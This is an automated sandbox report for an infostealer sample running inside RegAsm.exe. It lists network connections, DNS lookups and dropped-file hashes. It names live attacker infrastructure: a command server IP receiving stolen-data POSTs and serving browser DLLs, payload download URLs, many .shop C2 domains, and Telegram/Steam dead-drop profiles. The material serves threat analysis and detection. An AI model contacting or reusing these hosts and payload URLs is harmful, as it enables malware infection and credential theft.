    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: D9803D317DCA452FA8A86F274D73F0B7 Ref B: LON04EDGE0818 Ref C: 2024-09-19T23:34:44Z
    date: Thu, 19 Sep 2024 23:34:43 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301202_1RQN0RMZHNRAOB7W6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239317301202_1RQN0RMZHNRAOB7W6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 352234
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 0293A89D391C4388AD3AAF5E1481FF5F Ref B: LON04EDGE0818 Ref C: 2024-09-19T23:34:44Z
    date: Thu, 19 Sep 2024 23:34:43 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301330_16DHBP5UB5EI8DA4M&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239317301330_16DHBP5UB5EI8DA4M&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 306374
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 3B6B907B8D2044BABA6EA064559D8A45 Ref B: LON04EDGE0818 Ref C: 2024-09-19T23:34:44Z
    date: Thu, 19 Sep 2024 23:34:43 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239340418582_18ZLZW09JZ7BHXRKX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239340418582_18ZLZW09JZ7BHXRKX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 241999
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: DACDDEDEBED64363B125B1D477AE346E Ref B: LON04EDGE0818 Ref C: 2024-09-19T23:34:44Z
    date: Thu, 19 Sep 2024 23:34:43 GMT
  • flag-us
    DNS
    174.117.168.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    174.117.168.52.in-addr.arpa
    IN PTR
    Response
  • 149.154.167.99:443
    https://t.me/edm0d
    tls, http
    RegAsm.exe
    1.5kB
    19.4kB
    24
    20

    HTTP Request

    GET https://t.me/edm0d

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.0kB
    2.7kB
    11
    8

    HTTP Request

    GET https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.5kB
    622 B
    10
    6

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.6kB
    2.6kB
    11
    8

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.7kB
    6.4kB
    14
    10

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.5kB
    672 B
    9
    6

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    6.0kB
    645 B
    13
    8

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/sqlp.dll
    tls, http
    RegAsm.exe
    95.8kB
    2.5MB
    1839
    1833

    HTTP Request

    GET https://116.202.0.195/sqlp.dll

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.6kB
    565 B
    9
    6

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.6kB
    565 B
    9
    6

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/freebl3.dll
    tls, http
    RegAsm.exe
    24.4kB
    707.6kB
    517
    515

    HTTP Request

    GET https://116.202.0.195/freebl3.dll

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/mozglue.dll
    tls, http
    RegAsm.exe
    21.8kB
    627.9kB
    460
    457

    HTTP Request

    GET https://116.202.0.195/mozglue.dll

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/msvcp140.dll
    tls, http
    RegAsm.exe
    16.3kB
    464.7kB
    341
    338

    HTTP Request

    GET https://116.202.0.195/msvcp140.dll

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/softokn3.dll
    tls, http
    RegAsm.exe
    9.8kB
    266.6kB
    199
    196

    HTTP Request

    GET https://116.202.0.195/softokn3.dll

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/vcruntime140.dll
    tls, http
    RegAsm.exe
    3.8kB
    84.0kB
    68
    65

    HTTP Request

    GET https://116.202.0.195/vcruntime140.dll

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/nss3.dll
    tls, http
    RegAsm.exe
    70.9kB
    2.1MB
    1528
    1524

    HTTP Request

    GET https://116.202.0.195/nss3.dll

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    2.3kB
    605 B
    10
    7

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.5kB
    2.8kB
    10
    7

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.5kB
    2.1kB
    10
    7

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.6kB
    565 B
    9
    6

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    125.8kB
    2.4kB
    99
    52

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.5kB
    748 B
    9
    6

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 147.45.44.104:80
    http://147.45.44.104/prog/66ecb44c35444_vfdhsgdf.exe
    http
    RegAsm.exe
    23.6kB
    688.4kB
    500
    495

    HTTP Request

    GET http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exe

    HTTP Response

    200

    HTTP Request

    GET http://147.45.44.104/prog/66ecb44c35444_vfdhsgdf.exe

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    2.6kB
    577 B
    10
    6

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 172.67.204.62:443
    https://questionmwq.shop/api
    tls, http
    RegAsm.exe
    1.0kB
    4.5kB
    9
    9

    HTTP Request

    POST https://questionmwq.shop/api

    HTTP Response

    200
  • 172.67.173.81:443
    https://chickerkuso.shop/api
    tls, http
    RegAsm.exe
    1.2kB
    4.5kB
    10
    9

    HTTP Request

    POST https://chickerkuso.shop/api

    HTTP Response

    200
  • 104.21.39.77:443
    https://achievenmtynwjq.shop/api
    tls, http
    RegAsm.exe
    1.2kB
    5.0kB
    11
    10

    HTTP Request

    POST https://achievenmtynwjq.shop/api

    HTTP Response

    200
  • 172.67.211.222:443
    https://puredoffustow.shop/api
    tls, http
    RegAsm.exe
    1.0kB
    4.6kB
    9
    9

    HTTP Request

    POST https://puredoffustow.shop/api

    HTTP Response

    200
  • 172.67.209.183:443
    https://opponnentduei.shop/api
    tls, http
    RegAsm.exe
    1.0kB
    4.5kB
    9
    9

    HTTP Request

    POST https://opponnentduei.shop/api

    HTTP Response

    200
  • 104.21.75.242:443
    https://metallygaricwo.shop/api
    tls, http
    RegAsm.exe
    1.0kB
    4.5kB
    9
    9

    HTTP Request

    POST https://metallygaricwo.shop/api

    HTTP Response

    200
  • 104.21.50.100:443
    https://milldymarskwom.shop/api
    tls, http
    RegAsm.exe
    1.0kB
    4.6kB
    9
    9

    HTTP Request

    POST https://milldymarskwom.shop/api

    HTTP Response

    200
  • 104.21.37.45:443
    https://quotamkdsdqo.shop/api
    tls, http
    RegAsm.exe
    1.0kB
    4.6kB
    9
    9

    HTTP Request

    POST https://quotamkdsdqo.shop/api

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.6kB
    525 B
    8
    5

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 172.67.192.105:443
    https://carrtychaintnyw.shop/api
    tls, http
    RegAsm.exe
    1.0kB
    4.6kB
    9
    9

    HTTP Request

    POST https://carrtychaintnyw.shop/api

    HTTP Response

    200
  • 104.82.131.75:443
    https://steamcommunity.com/profiles/76561199724331900
    tls, http
    RegAsm.exe
    1.5kB
    42.2kB
    21
    36

    HTTP Request

    GET https://steamcommunity.com/profiles/76561199724331900

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.4kB
    518 B
    8
    5

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 149.154.167.99:443
    https://t.me/edm0d
    tls, http
    RegAsm.exe
    1.5kB
    19.2kB
    24
    20

    HTTP Request

    GET https://t.me/edm0d

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.0kB
    2.7kB
    11
    8

    HTTP Request

    GET https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.4kB
    622 B
    9
    6

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.5kB
    2.2kB
    10
    7

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.7kB
    6.4kB
    13
    10

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.5kB
    672 B
    9
    6

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    6.1kB
    645 B
    13
    8

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/sqlp.dll
    tls, http
    RegAsm.exe
    85.1kB
    2.5MB
    1835
    1828

    HTTP Request

    GET https://116.202.0.195/sqlp.dll

    HTTP Response

    200
  • 116.202.0.195:443
    https://116.202.0.195/
    tls, http
    RegAsm.exe
    1.5kB
    528 B
    8
    5

    HTTP Request

    POST https://116.202.0.195/

    HTTP Response

    200
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    https://tse1.mm.bing.net/th?id=OADD2.10239340418582_18ZLZW09JZ7BHXRKX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    tls, http2
    75.7kB
    2.1MB
    1564
    1562

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418581_1PW4UWMX6DVDU64ZR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317300897_1II1YIPQNQ7MCYUAK&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301611_1E01O38L32FSSHIRP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301202_1RQN0RMZHNRAOB7W6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301330_16DHBP5UB5EI8DA4M&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418582_18ZLZW09JZ7BHXRKX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Response

    200
  • 8.8.8.8:53
    58.55.71.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    58.55.71.13.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    67.31.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    67.31.126.40.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    t.me
    dns
    RegAsm.exe
    50 B
    66 B
    1
    1

    DNS Request

    t.me

    DNS Response

    149.154.167.99

  • 8.8.8.8:53
    55.36.223.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    55.36.223.20.in-addr.arpa

  • 8.8.8.8:53
    99.167.154.149.in-addr.arpa
    dns
    73 B
    166 B
    1
    1

    DNS Request

    99.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    41.249.124.192.in-addr.arpa
    dns
    73 B
    113 B
    1
    1

    DNS Request

    41.249.124.192.in-addr.arpa

  • 8.8.8.8:53
    195.0.202.116.in-addr.arpa
    dns
    72 B
    129 B
    1
    1

    DNS Request

    195.0.202.116.in-addr.arpa

  • 8.8.8.8:53
    28.118.140.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    28.118.140.52.in-addr.arpa

  • 8.8.8.8:53
    133.211.185.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    133.211.185.52.in-addr.arpa

  • 8.8.8.8:53
    104.44.45.147.in-addr.arpa
    dns
    72 B
    127 B
    1
    1

    DNS Request

    104.44.45.147.in-addr.arpa

  • 8.8.8.8:53
    questionmwq.shop
    dns
    RegAsm.exe
    62 B
    94 B
    1
    1

    DNS Request

    questionmwq.shop

    DNS Response

    172.67.204.62
    104.21.85.92

  • 8.8.8.8:53
    62.204.67.172.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    62.204.67.172.in-addr.arpa

  • 8.8.8.8:53
    chickerkuso.shop
    dns
    RegAsm.exe
    62 B
    94 B
    1
    1

    DNS Request

    chickerkuso.shop

    DNS Response

    172.67.173.81
    104.21.88.61

  • 8.8.8.8:53
    achievenmtynwjq.shop
    dns
    RegAsm.exe
    66 B
    98 B
    1
    1

    DNS Request

    achievenmtynwjq.shop

    DNS Response

    104.21.39.77
    172.67.143.200

  • 8.8.8.8:53
    81.173.67.172.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    81.173.67.172.in-addr.arpa

  • 8.8.8.8:53
    puredoffustow.shop
    dns
    RegAsm.exe
    64 B
    96 B
    1
    1

    DNS Request

    puredoffustow.shop

    DNS Response

    172.67.211.222
    104.21.85.226

  • 8.8.8.8:53
    opponnentduei.shop
    dns
    RegAsm.exe
    64 B
    96 B
    1
    1

    DNS Request

    opponnentduei.shop

    DNS Response

    172.67.209.183
    104.21.45.51

  • 8.8.8.8:53
    77.39.21.104.in-addr.arpa
    dns
    71 B
    133 B
    1
    1

    DNS Request

    77.39.21.104.in-addr.arpa

  • 8.8.8.8:53
    222.211.67.172.in-addr.arpa
    dns
    73 B
    135 B
    1
    1

    DNS Request

    222.211.67.172.in-addr.arpa

  • 8.8.8.8:53
    metallygaricwo.shop
    dns
    RegAsm.exe
    65 B
    97 B
    1
    1

    DNS Request

    metallygaricwo.shop

    DNS Response

    104.21.75.242
    172.67.184.9

  • 8.8.8.8:53
    milldymarskwom.shop
    dns
    RegAsm.exe
    65 B
    97 B
    1
    1

    DNS Request

    milldymarskwom.shop

    DNS Response

    104.21.50.100
    172.67.204.182

  • 8.8.8.8:53
    quotamkdsdqo.shop
    dns
    RegAsm.exe
    63 B
    95 B
    1
    1

    DNS Request

    quotamkdsdqo.shop

    DNS Response

    104.21.37.45
    172.67.203.241

  • 8.8.8.8:53
    242.75.21.104.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    242.75.21.104.in-addr.arpa

  • 8.8.8.8:53
    183.209.67.172.in-addr.arpa
    dns
    73 B
    135 B
    1
    1

    DNS Request

    183.209.67.172.in-addr.arpa

  • 8.8.8.8:53
    100.50.21.104.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    100.50.21.104.in-addr.arpa

  • 8.8.8.8:53
    45.37.21.104.in-addr.arpa
    dns
    71 B
    133 B
    1
    1

    DNS Request

    45.37.21.104.in-addr.arpa

  • 8.8.8.8:53
    carrtychaintnyw.shop
    dns
    RegAsm.exe
    66 B
    98 B
    1
    1

    DNS Request

    carrtychaintnyw.shop

    DNS Response

    172.67.192.105
    104.21.81.254

  • 8.8.8.8:53
    steamcommunity.com
    dns
    RegAsm.exe
    64 B
    80 B
    1
    1

    DNS Request

    steamcommunity.com

    DNS Response

    104.82.131.75

  • 8.8.8.8:53
    genedjestytw.shop
    dns
    RegAsm.exe
    63 B
    120 B
    1
    1

    DNS Request

    genedjestytw.shop

  • 8.8.8.8:53
    105.192.67.172.in-addr.arpa
    dns
    73 B
    135 B
    1
    1

    DNS Request

    105.192.67.172.in-addr.arpa

  • 8.8.8.8:53
    75.131.82.104.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    75.131.82.104.in-addr.arpa

  • 8.8.8.8:53
    gacan.zapto.org
    dns
    RegAsm.exe
    61 B
    121 B
    1
    1

    DNS Request

    gacan.zapto.org

  • 8.8.8.8:53
    t.me
    dns
    RegAsm.exe
    50 B
    66 B
    1
    1

    DNS Request

    t.me

    DNS Response

    149.154.167.99

  • 8.8.8.8:53
    50.23.12.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    50.23.12.20.in-addr.arpa

  • 8.8.8.8:53
    198.187.3.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    198.187.3.20.in-addr.arpa

  • 8.8.8.8:53
    18.134.221.88.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    18.134.221.88.in-addr.arpa

  • 8.8.8.8:53
    25.140.123.92.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    25.140.123.92.in-addr.arpa

  • 8.8.8.8:53
    48.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    48.229.111.52.in-addr.arpa

  • 8.8.8.8:53
    205.47.74.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    205.47.74.20.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    124 B
    340 B
    2
    2

    DNS Request

    tse1.mm.bing.net

    DNS Request

    tse1.mm.bing.net

    DNS Response

    150.171.27.10
    150.171.28.10

    DNS Response

    150.171.28.10
    150.171.27.10

  • 8.8.8.8:53
    174.117.168.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    174.117.168.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\CGDGCFBAEG.exe

    Filesize

    354KB

    MD5

    384a847ad2833788fa253433fd2eea8d

    SHA1

    1984d8788fe40bd95a90d7d4e9dea6c4e4ff6201

    SHA256

    de30491736617249b3e80fc9436ecf0f7675b3c3014509398c3db7298f93336a

    SHA512

    bcdbd44837629d8881c29a7c7f6a2d4e98b52fbc49952bad2c89340a1dee18fac9987aaa8a3d91905a1f88a216c0e2501201a8665f3df7d5f627ff71a2418aac

  • C:\ProgramData\IIEBAFCBKF.exe

    Filesize

    292KB

    MD5

    4a8a0ccfecc930091116324c79c1006e

    SHA1

    d790befcbc31a4befafeaf08879e15f99633b2a1

    SHA256

    146b7006b041d25b6846c797234f38387ec4b141c4a7e4f100d0e6d2eda29088

    SHA512

    ffef04766c2a9f9d038ccf6156ac7f03a0e0809adaf245a1347e5ece6ad31f9b37f283d71d34c031350456f30036078d5a3e97fa563bf6af6a8fcf6edeeb25d2

  • C:\ProgramData\KJEHJKJEBGHJ\CBFBKF

    Filesize

    160KB

    MD5

    f310cf1ff562ae14449e0167a3e1fe46

    SHA1

    85c58afa9049467031c6c2b17f5c12ca73bb2788

    SHA256

    e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

    SHA512

    1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

  • C:\ProgramData\mozglue.dll

    Filesize

    593KB

    MD5

    c8fd9be83bc728cc04beffafc2907fe9

    SHA1

    95ab9f701e0024cedfbd312bcfe4e726744c4f2e

    SHA256

    ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

    SHA512

    fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

  • C:\ProgramData\nss3.dll

    Filesize

    2.0MB

    MD5

    1cc453cdf74f31e4d913ff9c10acdde2

    SHA1

    6e85eae544d6e965f15fa5c39700fa7202f3aafe

    SHA256

    ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

    SHA512

    dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\156887258BBD6E1FEF562837733EA04E_5BBC02CEDFD3F7AC9E268D830CF231EE

    Filesize

    2KB

    MD5

    4c4bf9e4d624f1045d8f73ed7f97dc3e

    SHA1

    1d78800f4a780fc6f75a778faeed2baaf84f2206

    SHA256

    6dcfee83067db655225002d6ee68c1948d82de8a4b488355fbdee6fce73638db

    SHA512

    4c950580ec4fb088382f066948964846bbee5d575eac1f70253e5adc3c09f071d398c1b6eb42fb2a00e017ba2a344ef6709c6f321a5b38db8bd39933989494bb

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771

    Filesize

    2KB

    MD5

    7ec05ad5ad4ea2f59d78a181b608dfb1

    SHA1

    95dfcb1ca8c7c6353bfc940c79f877d491158faa

    SHA256

    197a38efa533f9ff60b730cbc9b5fb604893e8dfb08a9ba85f0e5424779e3759

    SHA512

    da07b1ce6b278f20a93cfb83107be1a96bd134657be71f31b314e981ae9f85a8db50ae10458612bd460baca5e9402d5bce61b11ed648b191be42882273b8c00a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D

    Filesize

    1KB

    MD5

    9ea353ed4fed6ed641da2a1a1e66cbf3

    SHA1

    42cf55d3608819795042c23df5f18fcd2b6b0c58

    SHA256

    5245794a9cb70971f00a51f56b8b5305d16629c4d0d0e95916371a20a6119485

    SHA512

    7476acf575e998c56bae27703d635c82a5cfd43f736b9618ec430168148f25d79c97ca344670298b51956ca0b3707d6499ef5865fe1b933acb948dddc822d05e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\156887258BBD6E1FEF562837733EA04E_5BBC02CEDFD3F7AC9E268D830CF231EE

    Filesize

    458B

    MD5

    27a8dae1ee49481f98bf4bfdd39ed2c9

    SHA1

    45db0a1cc3ce7205854e411c8f07cba40980d2d7

    SHA256

    8430147602ca2587591250a4be4471d9245f7cfcaef796f9debbfaaf559a8c44

    SHA512

    a234db5b908c4b98db8a780d68c8c3a539f257167134d61ab9fec6f140de12202795a8797186642c5ee189a77e9c533b1582eae453e208400945c519acb6c981

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771

    Filesize

    450B

    MD5

    58947f5f7670cc12149ea68fb75d8364

    SHA1

    6b7b42eb243ecf6697417f63f7d12a27b08709da

    SHA256

    873fb435bf386720b30ba5d9da65350e15a8a208beab2b5bbd2e5f1fe8b00450

    SHA512

    b86355477b2a6fdf5854ba56396745d7128b7a291d6028b905d4ee9e3388d72c633ab7f02fdd84e1f92d6c16d3c57462515c57cb25f0850092c8cee9a4eb660c

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D

    Filesize

    458B

    MD5

    289ee092606d772e91be51ed30232610

    SHA1

    7d8db09f4b22fd58a5ed87059517af8caca659c7

    SHA256

    04de857b03408b5ca62653c45df2aa17cc07a80cbc4a2b5b22966a2519460ca0

    SHA512

